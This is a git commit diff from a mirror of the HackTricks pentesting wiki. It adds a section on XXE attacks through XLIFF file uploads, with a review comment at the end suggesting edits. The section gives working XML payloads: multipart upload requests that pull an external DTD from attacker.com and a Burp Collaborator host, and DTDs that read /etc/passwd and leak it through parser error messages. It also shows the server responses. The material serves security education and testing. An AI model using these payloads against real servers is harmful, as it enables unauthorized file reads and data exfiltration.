mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
GitBook: [master] one page modified
This commit is contained in:
parent eba0ef4af8
commit 7a32414356
1 changed file with 75 additions and 0 deletions
@ -515,6 +515,81 @@ You can use the \[**"Encode Recipe**" of cyberchef here \]\([https://gchq.github
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
```
## XLIFF - XXE
This section was taken from [https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe](https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe)
According to the [Wikipedia](https://en.wikipedia.org/wiki/XLIFF):
> XLIFF \(XML Localization Interchange File Format\) is an XML-based bitext format created to standardize the way localizable data are passed between and among tools during a localization process and a common format for CAT tool exchange.
### Blind request
```markup
------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="file"; filename="xxe.xliff"
Content-Type: application/x-xliff+xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE XXE [
<!ENTITY % remote SYSTEM "http://redacted.burpcollaborator.net/?xxe_test"> %remote; ]>
<xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--
```
The server response with an error:
```javascript
{"status":500,"error":"Internal Server Error","message":"Error systemId: http://redacted.burpcollaborator.net/?xxe_test; The markup declarations contained or pointed to by the document type declaration must be well-formed."}
```
But we got a hit on Burp Collaborator.
### Exfiltrating Data via Out of Band
```markup
------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="file"; filename="xxe.xliff"
Content-Type: application/x-xliff+xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE XXE [
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]>
<xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--
```
Based on the displayed User Agent returned by burp collaborator, it appears that it is using **Java 1.8**. One of the problems when exploiting XXE on this version of Java is **we’re unable to obtain the files containing a `New Line`** such as `/etc/passwd` using the Out of Band technique.
### Exfiltrating Data via Error Based
DTD File:
```markup
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % foo "<!ENTITY % xxe SYSTEM 'file:///nofile/'>">
%foo;
%xxe;
```
Server Response:
```javascript
{"status":500,"error":"Internal Server Error","message":"IO error.\nReason: /nofile (No such file or directory)"}
```
Great! The `non-exist` file is reflected in the Error messages. Next is adding the File Content.
DTD File:
```markup
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % foo "<!ENTITY % xxe SYSTEM 'file:///nofile/%data;'>">
%foo;
%xxe;
```
And the content of the file was successfully **printed in the output of the error sent via HTTP**.
## RSS - XEE
Valid XML with RSS format to exploit an XXE vulnerability.
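Review bot: the "Exfiltrating Data via Out of Band" subsection posts a request whose DOCTYPE pulls `http://attacker.com/evil.dtd` but never shows what `evil.dtd` contains, so the OOB step cannot be reproduced from the page; add the external DTD next to the request, as the error-based subsection below it already does for its own DTD. In the paragraph after that request, "the displayed User Agent returned by burp collaborator" should read "the User-Agent of the request received by Burp Collaborator": the header is in the HTTP request the target parser makes, and that is what identifies it as Java 1.8. In "Exfiltrating Data via Error Based", the sentence "The `non-exist` file is reflected in the Error messages" should state the mechanism the two payloads rely on, namely that the parser echoes the unresolved `file:///nofile/…` path in its IO error, so whatever `%data;` expands to is carried in that path; it is worth adding the caveat that this only works when the application returns the parser's error message to the client, as the 500 responses shown here do. Finally, the trailing context heading `## RSS - XEE` should read `## RSS - XXE` to match the rest of the page.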